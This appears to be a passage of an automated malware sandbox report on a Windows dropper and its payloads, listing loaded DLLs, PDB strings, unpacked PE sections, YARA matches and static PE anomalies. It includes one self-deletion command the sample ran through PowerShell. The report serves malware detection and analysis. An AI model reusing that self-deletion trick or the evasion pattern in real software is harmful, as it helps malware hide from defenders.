                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeSection loaded: winmm.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: apphelp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: version.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: shfolder.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: uxtheme.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: windows.storage.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: wldp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: profapi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: sspicli.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: winhttp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: webio.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: mswsock.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: iphlpapi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: winnsi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: dnsapi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: rasadhlp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: fwpuclnt.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: schannel.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: mskeyprotect.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ntasn1.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ncrypt.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ncryptsslp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: msasn1.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: cryptsp.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: rsaenh.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: cryptbase.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: gpapi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: dpapi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: kernel.appcore.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: wbemcomn.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: amsi.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: userenv.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                              Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exeSection loaded: schannel.dll
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: file.exeStatic file information: File size 2976768 > 1048576
                              Source: file.exeStatic PE information: Raw size of qnusxmvo is bigger than: 0x100000 < 0x2a5000
                              Source: Binary string: wkernel32.pdb source: ac68c6b737.exe, 00000015.00000003.2740135407.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740038871.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdb source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdb source: ac68c6b737.exe, 00000015.00000003.2739303628.00000000051B0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739087484.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2739796266.0000000005160000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739612321.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2739303628.00000000051B0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739087484.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: ac68c6b737.exe, 00000015.00000003.2739796266.0000000005160000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739612321.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdb source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wkernel32.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2740135407.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740038871.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, e56fffc2ce.exe, 0000000E.00000000.2625265677.00000000008B2000.00000002.00000001.01000000.00000012.sdmp

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.b70000.0.unpack :EW;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.b70000.0.unpack :EW;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.b70000.1.unpack :EW;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qnusxmvo:EW;fqlahttk:EW;.taggant:EW;
                              Source: C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exeUnpacked PE file: 21.2.ac68c6b737.exe.110000.0.unpack :EW;.rsrc:W;.idata :W; :EW;alcvhdaz:EW;vjrkdbwz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;alcvhdaz:EW;vjrkdbwz:EW;.taggant:EW;
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeUnpacked PE file: 27.2.1be411a3d2ff4d5e9f89420f2740d28f.exe.e0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                              Source: 7.2.zudFSfy.exe.ec60000.4.raw.unpack, p70yJbu5bF4vKhUO1a.cs.Net Code: b0a6Vp3JoK System.Reflection.Assembly.Load(byte[])
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                              Source: Yara matchFile source: 9.2.zudFSfy.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.zudFSfy.exe.434d790.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.kz8ZdyP.exe.5260000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.kz8ZdyP.exe.3add790.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000009.00000002.2486574208.0000000003543000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2579288387.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2499361350.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2583286972.0000000005260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: zudFSfy.exe PID: 2144, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: kz8ZdyP.exe PID: 7280, type: MEMORYSTR
                              Source: random[1].exe0.6.drStatic PE information: 0xC03B6D70 [Sun Mar 13 18:41:52 2072 UTC]
                              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                              Source: random[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                              Source: e56fffc2ce.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x6066
                              Source: random[1].exe1.6.drStatic PE information: real checksum: 0x1f1d7e should be: 0x1e35a0
                              Source: ac68c6b737.exe.6.drStatic PE information: real checksum: 0x1f1d7e should be: 0x1e35a0
                              Source: kz8ZdyP.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x114703
                              Source: file.exeStatic PE information: real checksum: 0x2dc28a should be: 0x2e1d61
                              Source: skotes.exe.0.drStatic PE information: real checksum: 0x2dc28a should be: 0x2e1d61
                              Source: 96ae609d19.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x75713
                              Source: random[1].exe0.6.drStatic PE information: real checksum: 0x0 should be: 0x6066
                              Source: zudFSfy[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                              Source: 641d24797a.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xc2aa1
                              Source: zudFSfy.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x11353a
                              Source: random[2].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x75713
                              Source: kz8ZdyP[1].exe.6.drStatic PE information: real checksum: 0x0 should be: 0x114703
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: file.exeStatic PE information: section name: qnusxmvo
                              Source: file.exeStatic PE information: section name: fqlahttk
                              Source: file.exeStatic PE information: section name: .taggant
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name: qnusxmvo
                              Source: skotes.exe.0.drStatic PE information: section name: fqlahttk
                              Source: skotes.exe.0.drStatic PE information: section name: .taggant
                              Source: random[1].exe1.6.drStatic PE information: section name:
                              Source: random[1].exe1.6.drStatic PE information: section name: .idata
                              Source: random[1].exe1.6.drStatic PE information: section name:
                              Source: random[1].exe1.6.drStatic PE information: section name: alcvhdaz
                              Source: random[1].exe1.6.drStatic PE information: section name: vjrkdbwz
                              Source: random[1].exe1.6.drStatic PE information: section name: .taggant
                              Source: ac68c6b737.exe.6.drStatic PE information: section name:
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: .idata
                              Source: ac68c6b737.exe.6.drStatic PE information: section name:
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: alcvhdaz
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: vjrkdbwz
                              Source: ac68c6b737.exe.6.drStatic PE information: section name: .taggant
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FD91C push ecx; ret 0_2_007FD92F
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F1359 push es; ret 0_2_007F135A
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E push 1E0398E1h; mov dword ptr [esp], edx0_2_008F7CEA
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F7B6E push 3A0F0400h; mov dword ptr [esp], ebx0_2_008F7DA1
